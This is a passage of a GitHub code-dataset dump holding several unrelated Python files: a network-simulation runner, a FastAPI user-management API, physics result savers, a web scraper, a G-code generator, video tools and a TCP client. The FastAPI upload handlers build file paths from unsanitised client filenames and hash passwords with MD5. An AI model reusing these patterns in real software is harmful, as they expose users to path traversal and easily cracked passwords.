entropy\n#for high entropy\nnumPackets = 500\nfor x in range(500, 6500, 500):\n\tcomp_cmds = './waf --run \"'\n\tcomp_cmds += 'compression-sim'\n\tcomp_cmds += ' --outputFile=' + compression_args['outputFile'] + str(numPackets) + '_H_' + '.csv' #rest of outputfile name\n\tcomp_cmds += ' --packetSize=' + compression_args['packetSize']\n\tcomp_cmds += ' --s0p0DataRate=' + compression_args['s0p0DataRate']\n\tcomp_cmds += ' --p1r0DataRate=' + compression_args['p1r0DataRate']\n\tcomp_cmds += ' --compression=' + compression_args['compression']\n\tcomp_cmds += ' --queueMode=' + compression_args['queueMode']\n\t#altered params\n\tcomp_cmds += ' --numPackets=' + str(numPackets)\n\tcomp_cmds += ' --entropy=' + 'h'\n\tcomp_cmds += ' --p0p1DataRate=' + '6Mbps'\n\tcomp_cmds += ' --p0QueueSize=' + compression_args['p0QueueSize']\n\tcomp_cmds += '\"'\n\tos.system(comp_cmds) \n\tnumPackets += 500\n#for low entropy\n#reset number of packets back to 500\nnumPackets = 500\nfor x in range(500, 6500, 500):\n\tcomp_cmds = './waf --run \"'\n\tcomp_cmds += 'compression-sim'\n\tcomp_cmds += ' --outputFile=' + compression_args['outputFile'] + str(numPackets) + '_L_' + '.csv'\n\tcomp_cmds += ' --packetSize=' + compression_args['packetSize']\n\tcomp_cmds += ' --s0p0DataRate=' + compression_args['s0p0DataRate']\n\tcomp_cmds += ' --p1r0DataRate=' + compression_args['p1r0DataRate']\n\tcomp_cmds += ' --compression=' + compression_args['compression']\n\tcomp_cmds += ' --queueMode=' + compression_args['queueMode']\n\t#altered params\n\tcomp_cmds += ' --numPackets=' + str(numPackets)\n\tcomp_cmds += ' --entropy=' + 'l'\n\tcomp_cmds += ' --p0p1DataRate=' + '6Mbps'\n\tcomp_cmds += ' --p0QueueSize=' + compression_args['p0QueueSize']\n\tcomp_cmds += '\"'\n\tos.system(comp_cmds) \n\tnumPackets += 500","repo_name":"mg424/Compression-Analysis","sub_path":"code/automate.py","file_name":"automate.py","file_ext":"py","file_size_in_byte":3827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"808197826","text":"# -*- coding: utf-8 -*-\nfrom fastapi import APIRouter, Depends, UploadFile, File, Form\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import Session\n\nfrom extend.get_db import get_db\nfrom models.user.user_model import User\nfrom models.user.user_ret_model import UserRet\nfrom utils import token\nfrom utils.get_md5_data import get_md5_pwd\nfrom models.user.user_operation import get_user_pagenation, get_user_total, active, user_update, delete_user_by_id, \\\n user_add, get_user_query_pagenation, get_user_query_total, get_departments, get_departments_except_me, \\\n get_user_by_id\n\nrouter = APIRouter(\n prefix='/user'\n)\n\n\n@router.get('/user_list', tags=['用户模块'])\ndef get_user_list(page_size: int, current_page: int, id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n users = get_user_pagenation(db, page_size, current_page)\n total = get_user_total(db)\n departments = get_departments(db) # 用于前端选择部门时展示\n content = {\n 'users': users,\n 'pageSize': page_size,\n 'currentPage': current_page,\n 'pageTotal': total,\n 'departments': departments\n }\n return content\n\n\n@router.get('/query', tags=['用户模块'])\ndef get_user_query_list(username: str, department_name: str, page_size: int, current_page: int,\n id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n users = get_user_query_pagenation(db, username, department_name, page_size, current_page)\n total = get_user_query_total(db, username, department_name)\n\n content = {\n 'users': users,\n 'pageSize': page_size,\n 'currentPage': current_page,\n 'pageTotal': total\n }\n return content\n\n\n@router.post('/active', tags=['用户模块'])\ndef active_user(user: UserRet, id: str = Depends(token.parse_token), db: Session = Depends(get_db)):\n if user.state == 1:\n state = 2\n else:\n state = 1\n\n active(db, user.id, state)\n if user.state == 1:\n return {'code': 200, 'msg': '停用成功', 'state': 1}\n if user.state == 2:\n return {'code': 200, 'msg': '启用成功', 'state': 2}\n\n\n# 添加用户\n@router.post('/add', tags=['用户模块'])\nasync def add(avatar: UploadFile = File(...),\n username: str = Form(...),\n department_name: str = Form(...),\n pwd: str = Form(...),\n addr: str = Form(...),\n state: int = Form(...),\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n rep = await avatar.read()\n file_path = 'uploads/users/' + avatar.filename\n with open(file_path, 'wb') as f:\n f.write(rep)\n md5_pwd = get_md5_pwd(pwd)\n user_add(db, username, md5_pwd, addr, state, file_path, department_name)\n return JSONResponse(content={\n 'code': 200,\n 'msg': '添加成功',\n })\n\n\n# 用户修改,涉及图片上传,用formdata的形式\n@router.post('/edit', tags=['用户模块'])\nasync def edit(avatar: UploadFile = File(...),\n id: int = Form(...),\n username: str = Form(...),\n pwd: str = Form(...),\n addr: str = Form(...),\n state: int = Form(...),\n department_name: str = Form(...),\n # create_time: str = Form(...),\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n rep = await avatar.read()\n file_path = 'uploads/users/' + avatar.filename\n with open(file_path, 'wb') as f:\n f.write(rep)\n if pwd:\n md5_pwd = get_md5_pwd(pwd)\n else:\n md5_pwd = None\n user_update(db, id, username, md5_pwd, addr, state, file_path, department_name)\n\n return {'code': 200, 'msg': '更新成功', 'id': id}\n\n\n@router.post('/delete', tags=['用户模块'])\ndef delete_user(user: UserRet,\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n id = user.id\n delete_user_by_id(db, id)\n return JSONResponse(content={\n 'code': 200,\n 'msg': '删除成功',\n 'id': id\n })\n\n\n# 获取所有的部门\n@router.get('/get_departments', tags=['用户模块'])\ndef get_department(user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n departments = get_departments(db)\n return {\n 'code': 200,\n 'msg': '查询成功',\n 'departments': departments\n }\n\n\n# 获取除自己以外的所有部门\n@router.get('/get_departments_except_me', tags=['用户模块'])\ndef get_department_except(\n id: int,\n user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n departments = get_departments_except_me(db, id)\n return {\n 'code': 200,\n 'msg': '查询成功',\n 'departments': departments\n }\n\n\n# 获取用户头像\n@router.get('/get_avatar', tags=['用户模块'])\ndef get_avatar(user_id: str = Depends(token.parse_token),\n db: Session = Depends(get_db)):\n user = get_user_by_id(db, int(user_id))\n return {\n 'code': 200,\n 'avatar': user.avatar,\n }\n","repo_name":"springleeo/share_system","sub_path":"apps/user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35263003468","text":"import numpy as np\nfrom dolfin import*\n\ndef save_mesh(name,mesh,subdomains,meshes_location = \"./meshes\",paraview_location = \"./paraview\"):\n File(meshes_location+\"/3D/\" + name + \".xml\") << mesh\n File(paraview_location+\"/3D/\" + name + \"_mesh.pvd\") << mesh\n File(meshes_location+\"/3D/\" + name + \"_physical_region.xml\") << subdomains\n File(paraview_location+\"/3D/\" + name + \"_physical_region.pvd\") << subdomains\n return 0\n\ndef save_name(name,results_location=\"./results\"):\n text_file = open(results_location + \"/3D/Data/name.txt\", \"w\")\n text_file.write(name)\n text_file.close()\n\ndef save_elast_moduli(C,name,results_location=\"./results\"):\n np.savetxt(results_location + \"/3D/\" + name + \"_C.txt\", C)\n\ndef save_E_nu(name,Exx,Eyy,Ezz,Gxy,Gzx,Gyz,nuxy,nuzx,nuyz,results_location = \"./results\"):\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Exx.txt\", Exx) \n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Eyy.txt\", Eyy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Ezz.txt\", Ezz)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gxy.txt\", Gxy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gzx.txt\", Gzx)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_Gyz.txt\", Gyz)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuxy.txt\", nuxy)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuzx.txt\", nuzx)\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nuyz.txt\", nuyz)\n\ndef save_E_nu_iso(name,Exx=None,nuxy=None,results_location = \"./results\"):\n np.savetxt(results_location+\"/3D/Data/\" + name + \"_E.txt\", Exx) \n np.savetxt(results_location+\"/3D/Data/\" + name + \"_nu.txt\", nuxy)\n \ndef save_Elast_mpi(C_0,C_1,C,name):\n output_file = HDF5File(\"./results/3D/moduli.h5\", \"w\")\n output_file.write(C_0, \"c_0\"+name)\n output_file.write(C_1, \"c_1\"+name)\n output_file.write(C, \"C\"+name)\n output_file.close()\n \ndef save_graphs(name,vol_frac,s,C,K_Voigt,K_Reuss,G_Voigt,G_Reuss,K_Mori_Tanaka,G_Mori_Tanaka,K_num,G_num,results_location=\"./results\"):\n file = open(results_location+\"/3D/Graphs/{}_{}_{}.txt\".format(name,str(int(s)),str(round(vol_frac,2))[2:]),\"w\")\n file.write(\"E0/E1 = {} \\nvf = {} \\n\".format(s,vol_frac))\n file.write(\"K Voigt : {} \\n\".format(K_Voigt))\n file.write(\"K Reuss : {} \\n\".format(K_Reuss))\n file.write(\"MTK : {} \\n\".format(K_Mori_Tanaka))\n file.write(\"FEM_A_K: {} \\n\".format(K_num))\n file.write(\"K00 : {} \\n\".format((C[0,0] + 2 * C[0,1])/3))\n file.write(\"K11 : {} \\n\".format((C[1,1] + 2 * C[1,2])/3))\n file.write(\"K22 : {} \\n\".format((C[2,2] + 2 * C[2,1])/3))\n file.write(\"G Voigt : {} \\n\".format(G_Voigt))\n file.write(\"G Reuss : {} \\n\".format(G_Reuss))\n file.write(\"MTG : {} \\n\".format(G_Mori_Tanaka))\n file.write(\"FEM_A_G : {} \\n\".format(G_num))\n file.write(\"G33 : {} \\n\".format((C[3,3])))\n file.write(\"G44 : {} \\n\".format((C[4,4])))\n file.write(\"G55 : {} \\n\".format((C[5,5])))\n\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"acseai1419/Crius","sub_path":"numerical_analysis/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20536961797","text":"# -*- coding: utf-8 -*-\nimport re\nfrom decimal import Decimal\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse, FormRequest\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.item import Item, Field\nimport json\nimport itertools\n\nfrom scrapy import log\n\nfrom product_spiders.spiders.bensons.bedroomworld_co_uk import BedroomworldSpider\n\nfrom product_spiders.base_spiders.primary_spider import PrimarySpider\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\n\nclass Meta(Item):\n net_price = Field()\n\n\nclass BedroomworldSpider(BedroomworldSpider):\n name = \"colourbank-bedroomworld.co.uk\"\n allowed_domains = ('bedroomworld.co.uk', )\n start_urls = ('http://www.bedroomworld.co.uk/', )\n\n shipping_costs = {'MATTRESS': 9.99,\n 'DIVAN BED': 19.99,\n 'BEDSTEAD': 9.99,\n 'FURNITURE': 9.99,\n 'PILLOWS': 3.99}\n\n def _start_requests(self):\n # yield Request('http://www.bedroomworld.co.uk/p/Slumberland_Harmony_800_Pocket_Divan_Set.htm', callback=self.parse_product)\n # yield Request('http://www.bedroomworld.co.uk/p/Kingston_Single_Folding_Bed.htm', callback=self.parse_product)\n yield Request('http://www.bedroomworld.co.uk/p/Baltic_Futon_Set.htm', callback=self.parse_product)\n\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n loader = ProductLoader(item=Product(), response=response)\n self.log('Parsing %s' %response.url)\n self.log('Name %s' %hxs.select('//span[@itemprop=\"name\"]/text()').extract())\n sku = response.xpath('//div[contains(@class, \"order_code\")]/text()').extract()\n sku = sku[0].split()[0] if sku else ''\n loader.add_value('sku', sku)\n loader.add_value('url', response.url)\n loader.add_xpath('name', '//span[@itemprop=\"name\"]/text()')\n loader.add_xpath('price', '//span[starts-with(@id,\"item_price_\")]/text()')\n for category in hxs.select('//div[contains(@class, \"ws-breadcrumb\")]/a/text()').extract()[1:]:\n loader.add_value('category', category)\n img = hxs.select('//img[@id=\"imageMain\"]/@src').extract()\n if img:\n loader.add_value('image_url', urljoin_rfc(get_base_url(response), img[0]))\n\n brand = response.xpath('//span[@itemprop=\"brand\"]/text()').extract()\n brand = brand[0].strip() if brand else ''\n loader.add_value('brand', brand)\n\n names = {}\n for opt in hxs.select('//option[@mcode]'):\n mcode = opt.select('./@mcode').extract()[0]\n text = opt.select('normalize-space(./text())').extract()[0]\n names[mcode] = text\n \n loader.add_xpath('identifier', '//input[@id=\"item_details_product_id\"]/@value')\n loader.add_xpath('price', '//meta[@itemprop=\"price\"]/@content')\n loader.add_xpath('name', '//select[not(contains(@id, \"quantity_\"))]/option[@selected]/text()')\n product = loader.load_item()\n \n for key, shipping_cost in self.shipping_costs.iteritems():\n if key in product.get('category', \"\").upper():\n product['shipping_cost'] = shipping_cost\n break\n yield product\n \n url = 'http://www.bedroomworld.co.uk/ajax.get_exact_product.php?instart_disable_injection=true'\n sku = response.css('input#item_details_item_id::attr(value)').extract_first()\n attributes = response.xpath('//select/@id').re('(.+)_%s' %sku)\n attributes.remove('quantity')\n if not attributes:\n return\n options = []\n for attribute in attributes:\n options.append(response.xpath('//select[@id=\"%s_%s\"]/option/@value' %(attribute, sku)).extract())\n variants = itertools.product(*options)\n for variant in variants:\n formdata = {'item_id': sku}\n for attribute, option in zip(attributes, variant):\n formdata['attributes[%s]' %attribute] = option\n yield FormRequest(url, \n self.parse_options, \n formdata=formdata,\n meta={'item': Product(product)})\n\n def parse_options(self, response):\n json_data = json.loads(response.body)\n item = response.meta.get('item')\n prod_data = json_data['data']\n\n option_descriptions = prod_data['propertyType1']\n option_name = ''\n for option_desc in option_descriptions:\n if prod_data[option_desc].upper() not in item['name'].upper():\n option_name += ' ' + prod_data[option_desc]\n\n item['name'] += option_name\n item['identifier'] = prod_data['id']\n item['sku'] += '-' + prod_data['id']\n item['price'] = prod_data['ourprice']\n item['stock'] = prod_data['stockqty']\n\n yield item\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/colourbank/bedroomworld_spiders.py","file_name":"bedroomworld_spiders.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72513672412","text":"#!/usr/bin/env python3\n# -*- coding:utf8 -*-\nimport argparse\n\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument(\"--x-length\", help=\"X向长度(mm)\", type=int,required=True)\narg_parser.add_argument(\"--y-length\", help=\"Y向长度(mm)\", type=int,required=True)\n\narg_parser.add_argument(\"--line-width\", default=1.5,\n help=\"行距,一般为刀尖宽度/2\", type=float)\narg_parser.add_argument(\"--zero-pos\", default=\"LT\",\n help=\"对刀点:LT=左上,RT=左下,C=中心,LB=左下,RB=右下\")\narg_parser.add_argument(\"--speed\", default=500, help=\"行进速率F\", type=int)\narg_parser.add_argument(\"--safe-z\", default=10, help=\"安全高度\", type=int)\n\nargs = arg_parser.parse_args()\nif args.x_length <= 0 or args.y_length <= 0 or args.line_width <= 0.0:\n print(\"xy与行距均需大于0\")\n\nif args.zero_pos not in [\"LT\", \"RT\", \"C\", \"LB\", \"RB\"]:\n print(\"检测到不支持的对刀点,已将对刀点重置为左下\")\n args.zero_pos = \"LT\"\nfile_name = \"flat_zero_{}_{}_{}_{}_{}.gcode\".format(args.x_length, args.y_length,\n args.line_width, args.zero_pos, args.speed)\n\n\ncode_header = \"\"\"\nG0 Z{}\nG0 X{} Y{}\nG0 Z0\n\"\"\"\nmin_x = 0\nmin_y = 0 - args.y_length\nmax_x = args.x_length\nmax_y = 0\nif args.zero_pos == \"RT\":\n min_x = 0 - args.x_length\n min_y = 0-args.y_length\n max_x = 0\n max_y = 0\nelif args.zero_pos == \"C\":\n min_x = 0 - args.x_length/2\n min_y = 0-args.y_length/2\n max_x = args.x_length/2\n max_y = args.y_length/2\nelif args.zero_pos == \"LB\":\n min_x = 0\n min_y = 0\n max_x = args.x_length\n max_y = args.y_length\nelif args.zero_pos == \"RB\":\n min_x = 0 - args.x_length\n min_y = 0\n max_x = 0\n max_y = args.y_length\n\ncode_header = code_header.format(args.safe_z, min_x, min_y)\ncode = \"\"\ncode = code+code_header\ncurrent_y = min_y\nnext_x = min_x\nwhile current_y <= max_y:\n code = code+\"G1 X{} F{} \\n\".format(next_x, args.speed)\n next_x = min_x if next_x == max_x else max_x\n next_y = current_y+args.line_width if max_y - \\\n current_y >= args.line_width else max_y\n code = code+\"G1 Y{} F{} \\n\".format(next_y, args.speed)\n current_y = next_y if not current_y == next_y else current_y+1\n\nwith open(file_name, 'w') as source_file:\n source_file.write(code)\n source_file.flush()\n\nprint(\"保存为:{}\".format(file_name))\n","repo_name":"EnderCaster/CNC-flat-zero","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1436646384","text":"import click\n\nfrom vframe.utils import click_utils\nfrom vframe.models.types import FrameImage, FrameImageVar\nfrom vframe.utils.click_utils import processor\n\n@click.command('')\n@click.option('-o', '--output', 'opt_dir_out', required=True,\n help='Path to output directory')\n@click.option('-f', '--frame', 'opt_frame_type', default=FrameImage.DRAW.name.lower(),\n type=FrameImageVar,\n help=click_utils.show_help(FrameImage))\n@click.option('--fps', 'opt_fps', default=6,\n help='Override media FPS')\n@click.option('--loop', 'opt_loop', default=0,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--colors', 'opt_colors', default=256,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--optimize/--no-optimize', 'opt_optimize', \n is_flag=True, default=True,\n help='Number of times to loop GIF (0 = infinite)')\n@click.option('--subdirs', 'opt_keep_subdirs', is_flag=True,\n help='Keep subdirectory structure in output directory')\n@click.option('--palette', 'opt_palette', \n type=click.Choice(['web', 'adaptive']), default='web',\n help='Compression color palette')\n@click.option('--verbose', 'opt_verbose', is_flag=True,\n help='Check filesize after writing GIF')\n@processor\n@click.pass_context\ndef cli(ctx, sink, opt_dir_out, opt_frame_type, opt_fps, opt_keep_subdirs,\n opt_colors, opt_loop, opt_palette, opt_optimize, opt_verbose):\n \"\"\"Save to animated GIF\"\"\"\n \n from os.path import join\n from pathlib import Path\n\n import cv2 as cv\n from PIL import Image\n \n from vframe.settings.app_cfg import LOG, SKIP_FRAME, USE_DRAW_FRAME, READER\n from vframe.models.types import MediaType\n from vframe.utils.im_utils import np2pil, write_animated_gif\n from vframe.utils.file_utils import ensure_dir, filesize\n\n\n # ---------------------------------------------------------------------------\n # initialize\n\n if opt_frame_type == FrameImage.DRAW:\n ctx.obj[USE_DRAW_FRAME] = True\n \n frames = None\n fp_parent = None\n \n opt_palette = Image.WEB if opt_palette == 'web' else Image.ADAPTIVE\n opt_duration = 1000 // opt_fps\n\n convert_kwargs = {\n 'mode': 'P', \n 'dither': None, \n 'palette': opt_palette, \n 'colors': opt_colors,\n }\n gif_kwargs = {\n 'format': 'GIF',\n 'save_all': True, \n 'optimize': opt_optimize,\n 'duration': opt_duration, \n 'loop':opt_loop,\n }\n\n\n # ---------------------------------------------------------------------------\n # process \n \n while True:\n \n M = yield\n R = ctx.obj[READER]\n\n # Check if last file in a subdir\n if M.parent != fp_parent and frames is not None:\n write_animated_gif(fp_out, frames, verbose=opt_verbose, **gif_kwargs)\n frames = None\n fp_parent = None\n\n # check if new file in new subdir and start new gif\n if not ctx.obj[SKIP_FRAME] and \\\n frames is None and \\\n M.parent != fp_parent:\n\n # configure file io, add relative subdir output dir\n if opt_keep_subdirs and M.parent != Path(R.filepath):\n fp_subdir_rel = Path(M.filepath).relative_to(Path(R.filepath)).parent\n else:\n fp_subdir_rel = ''\n\n # output directory\n fp_dir_out = join(opt_dir_out, fp_subdir_rel)\n ensure_dir(fp_dir_out)\n\n # filename\n if M.type == MediaType.VIDEO:\n fn = Path(M.filename).stem # use video name as dir\n elif M.type == MediaType.IMAGE:\n fn = M.parent.name # use subdir name\n\n # output file\n fp_out = join(fp_dir_out, f'{fn}.gif')\n\n # init frames holder and store reference to current dir\n frames = []\n fp_parent = M.parent\n if opt_verbose:\n LOG.debug(f'Start: {fp_out}')\n\n\n # check if frame is usable and add to stack\n if not ctx.obj[SKIP_FRAME] and frames is not None:\n im = M.images.get(opt_frame_type)\n im_pil = np2pil(im).convert(**convert_kwargs)\n frames.append(im_pil)\n\n # check if last frame of last file\n if R.is_last_item and frames is not None and len(frames):\n write_animated_gif(fp_out, frames, verbose=opt_verbose, **gif_kwargs)\n frames = None\n fp_parent = None\n\n\n sink.send(media)","repo_name":"vframeio/vframe","sub_path":"src/commands/pipe/save-gif.py","file_name":"save-gif.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"32"} +{"seq_id":"11147000142","text":"import sling.pysling as api\n\nfrom sling.log import *\nfrom sling.nlp.document import *\nfrom sling.nlp.parser import *\n\nVERSION = \"3.0.0\"\n\nStore = api.Store\nFrame = api.Frame\nArray = api.Array\nString = api.String\n\nRecordReader = api.RecordReader\nRecordDatabase = api.RecordDatabase\nRecordWriter = api.RecordWriter\nDatabase = api.Database\n\nPhraseTable = api.PhraseTable\nCalendar = api.Calendar\nDate = api.Date\n\nWikiConverter = api.WikiConverter\nFactExtractor = api.FactExtractor\nPlausibilityModel = api.PlausibilityModel\nWikipedia = api.Wikipedia\nWebArchive = api.WebArchive\nWebsiteAnalysis = api.WebsiteAnalysis\nSubtokenizer = api.Subtokenizer\n\nMILLENNIUM = api.MILLENNIUM\nCENTURY = api.CENTURY\nDECADE = api.DECADE\nYEAR = api.YEAR\nMONTH = api.MONTH\nDAY = api.DAY\n\nCASE_INVALID = api.CASE_INVALID\nCASE_NONE = api.CASE_NONE\nCASE_UPPER = api.CASE_UPPER\nCASE_LOWER = api.CASE_LOWER\nCASE_TITLE = api.CASE_TITLE\n\nDBOVERWRITE = api.DBOVERWRITE\nDBADD = api.DBADD\nDBORDERED = api.DBORDERED\nDBNEWER = api.DBNEWER\n\nDBNEW = api.DBNEW\nDBUPDATED = api.DBUPDATED\nDBUNCHANGED = api.DBUNCHANGED\nDBEXISTS = api.DBEXISTS\nDBSTALE = api.DBSTALE\nDBFAULT = api.DBFAULT\n\n# Print out version and location of SLING Python API.\ndef which():\n import os\n import time\n location = __path__[0]\n if (os.path.islink(location)): location += \" -> \" + os.readlink(location)\n ts = time.ctime(os.path.getmtime(sling.api.__file__))\n print(\"SLING API version %s (%s) in %s\" % (VERSION, ts, location))\n\n","repo_name":"ringgaard/sling","sub_path":"python/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"32"} +{"seq_id":"14989560226","text":"import os\nimport math\nimport json\nimport subprocess\nfrom glob import glob\nfrom time import time\n\n\nclass FFmpegException(Exception):\n pass\n\n\nclass Transcoder(object):\n\n BASE_FFMPEG_OPTIONS = [\n \"-v\", \"error\",\n \"-stats\",\n ]\n CHUNK_LIST_FILENAME = \"chunks.txt\"\n CHUNK_FILENAME_BASE = \"chunk\"\n CHUNK_FILENAME_SEGMENT_FORMAT = \"%d\"\n CHUNK_FILENAME_GLOB_FORMAT = \"*\"\n\n def __init__(self, input_file, width=None, height=None, is_chunk=False):\n if not os.path.isfile(input_file):\n raise FileNotFoundError(input_file)\n\n self.__input = input_file\n self.__dir = os.path.dirname(input_file)\n self.__name, self.__ext = os.path.splitext(input_file)\n\n # .../chunks.txt\n self.__chunk_list_filepath = os.path.join(\n self.__dir, self.CHUNK_LIST_FILENAME\n )\n # .../chunk\n self.__chunk_base_path = os.path.join(\n self.__dir, self.CHUNK_FILENAME_BASE\n )\n # .../chunk%d.ext\n self.__chunk_filepath = ''.join((\n self.__chunk_base_path,\n self.CHUNK_FILENAME_SEGMENT_FORMAT,\n self.__ext\n ))\n # .../chunk*.ext\n self.__chunk_globpath = ''.join((\n self.__chunk_base_path,\n self.CHUNK_FILENAME_GLOB_FORMAT,\n self.__ext\n ))\n\n if is_chunk:\n assert width and height\n self.__width = width\n self.__height = height\n else:\n self.__info = self.__get_file_info_json()\n self.__width = self.__info[\"streams\"][0][\"width\"]\n self.__height = self.__info[\"streams\"][0][\"height\"]\n self.__duration = float(self.__info[\"format\"][\"duration\"])\n\n def __get_file_info_json(self):\n options = [\n '-v', 'error',\n '-print_format', 'json',\n '-show_format',\n '-show_streams'\n ]\n return json.loads(subprocess.check_output(\n ['ffprobe'] + options + [self.__input]\n ).decode())\n\n @property\n def dimensions(self):\n return self.__width, self.__height\n\n @property\n def chunk_files(self):\n if os.path.isfile(self.__chunk_list_filepath):\n files = []\n with open(self.__chunk_list_filepath, \"r\") as chunk_list:\n for line in chunk_list:\n if line.startswith(\"file \"):\n files.append(\n os.path.join(\n self.__dir,\n line.lstrip(\"file \").rstrip()\n )\n )\n return files\n print(\"No chunk list file present.\")\n return None\n\n def transsize(self, height, aspect_ratio, chunk_file=''):\n \"\"\"\n Change picture size of input file or given chunk file.\n Chunk files will be overwritten.\n \"\"\"\n if height < self.__height:\n if chunk_file and not os.path.isfile(chunk_file):\n raise FileNotFoundError(chunk_file)\n width = int(height * aspect_ratio)\n input = chunk_file or self.__input\n name = os.path.splitext(chunk_file)[0] or self.__name\n options = self.BASE_FFMPEG_OPTIONS + [\n '-i', input,\n # '-pix_fmt', 'yuv420p',\n '-vf', 'scale={}:{},format=pix_fmts=yuv420p'.format(width, height),\n ]\n # Recorded times\n # 320.55 - no pixel format\n # 312.36 - -pix_fmt\n # 302.20 - (BEST) format=pix_fmts\n output = \"{name}_{w}_{h}{ext}\".format(\n name=name, w=width, h=height, ext=self.__ext\n )\n info = \"{} {}x{} -> {}x{}\".format(\n os.path.basename(input),\n self.__width, self.__height,\n width, height\n )\n print(info)\n print(\"-\" * len(info))\n subprocess.call(['ffmpeg'] + options + [output])\n print()\n if chunk_file:\n # cannot overwrite file while transcoding so replace now\n os.rename(output, chunk_file)\n else:\n print(\"Cannot transsize. Height ({}) is greater than input \"\n \"file height ({}).\".format(height, self.__height))\n\n def transcode(self):\n \"\"\"\n Convert encoding of input file to given encoding.\n \"\"\"\n pass\n\n def transrate(self):\n \"\"\"\n Decrease bitrate of input file.\n \"\"\"\n pass\n\n def split(self, num_chunks):\n print(\"Splitting into {} chunks.\".format(num_chunks))\n chunk_time = self.get_chunk_time(num_chunks)\n # TODO: check if Timecode frame rate is specified (required for segmenting)\n try:\n self.__split_with_segment(chunk_time)\n except FFmpegException:\n print(\"Failed to split using FFmpeg segment option, falling back to manual splitting.\")\n self.__split_by_seeking(num_chunks, chunk_time)\n\n def get_chunk_time(self, num_chunks):\n return math.ceil(self.__duration / num_chunks)\n\n def __split_with_segment(self, chunk_time):\n options = self.BASE_FFMPEG_OPTIONS + [\n '-i', self.__input,\n '-c', 'copy',\n '-f', 'segment',\n '-segment_time', str(chunk_time),\n '-segment_list', self.__chunk_list_filepath,\n '-segment_list_type', 'ffconcat',\n '-reset_timestamps', '1',\n '-map', '0'\n ]\n try:\n subprocess.check_call(['ffmpeg'] + options + [self.__chunk_filepath])\n except subprocess.CalledProcessError as e:\n self.__remove_chunk_files()\n raise FFmpegException(e)\n\n def __split_by_seeking(self, num_chunks, chunk_time):\n for i in range(num_chunks):\n self.seek_split(i, chunk_time)\n # append to chunk list file\n with open(self.__chunk_list_filepath, \"a\") as chunk_list_file:\n chunk_list_file.write(\"file {}\\n\".format(\n ''.join((self.CHUNK_FILENAME_BASE, str(i), self.__ext))\n ))\n\n def seek_split(self, chunk_num, chunk_time):\n options = self.BASE_FFMPEG_OPTIONS + [\n '-ss', str(chunk_num * chunk_time),\n '-t', str(chunk_time),\n '-i', self.__input,\n '-c', 'copy',\n ]\n output = ''.join((self.__chunk_base_path, str(chunk_num), self.__ext))\n subprocess.call(['ffmpeg'] + options + [output])\n\n def stitch(self, suffix=None):\n print(\"Stitching...\")\n options = self.BASE_FFMPEG_OPTIONS + [\n '-f', 'concat',\n '-safe', '0',\n '-i', self.__chunk_list_filepath,\n '-c', 'copy'\n ]\n suffix = suffix or time()\n output = \"{name}_{suffix}{ext}\".format(\n name=self.__name, suffix=suffix, ext=self.__ext\n )\n subprocess.call(['ffmpeg'] + options + [output])\n self.__remove_chunk_files()\n\n def __remove_chunk_files(self):\n os.remove(self.__chunk_list_filepath)\n for chunk_file in glob(self.__chunk_globpath):\n os.remove(chunk_file)\n","repo_name":"Palisand/ffperf","sub_path":"transcoder.py","file_name":"transcoder.py","file_ext":"py","file_size_in_byte":7239,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4063721729","text":"from socket import *\n\nserverName = '127.0.0.1'\nserverPort = 12000\nclientSocket = socket(AF_INET,SOCK_STREAM)\nclientSocket.connect((serverName,serverPort))\n\nwhile True:\n print('Pick Either: Random, Add or Subtract: ')\n case = input()\n while case != 'Random' and case != 'Add' and case != 'Subtract':\n print('Pick Either: Random, Add or Subtract: ')\n case = input()\n\n orderImportant = True\n \n while orderImportant:\n print('Pick first number: ')\n firstNumber = int(input())\n \n print('Pick second number: ')\n secondNumber = int(input())\n \n if secondNumber > firstNumber and case == 'Random':\n orderImportant = False\n elif secondNumber < 